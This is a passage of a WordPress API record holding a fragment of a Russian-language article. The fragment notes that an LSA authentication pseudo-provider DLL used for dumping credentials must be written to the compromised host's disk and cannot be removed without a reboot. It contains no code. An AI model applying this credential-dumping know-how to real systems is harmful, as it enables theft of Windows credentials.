\u0441\u043f\u043e\u0441\u043e\u0431\u0430 \u0431\u0435\u0437\u0443\u0441\u043b\u043e\u0432\u043d\u043e \u0432\u0445\u043e\u0434\u0438\u0442 \u0442\u043e, \u0447\u0442\u043e \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 DLL \u043f\u0441\u0435\u0432\u0434\u043e\u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 LSA <strong>\u0434\u043e\u043b\u0436\u043d\u0430<\/strong> \u0431\u044b\u0442\u044c \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0430 \u043d\u0430 \u0434\u0438\u0441\u043a \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0430 \u0434\u043b\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0435\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432 API <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/api\/ntsecpkg\/nc-ntsecpkg-splsamodeinitializefn\">SpLsaModeInitialize<\/a>, \u0438 \u043a\u043e\u0442\u043e\u0440\u0430\u044f, \u043a\u043e \u0432\u0441\u0435\u043c\u0443 \u043f\u0440\u043e\u0447\u0435\u043c\u0443, \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u0430 \u043f\u043e\u0441\u043b\u0435 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0434\u0430\u043c\u043f\u0430 \u0431\u0435\u0437 \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u041f\u041a.<\/p>\n<p>\u0414\u0430\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0435\u043a\u0442 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-332456","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/332456","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=332456"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/332456\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=332456"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=332456"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=332456"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}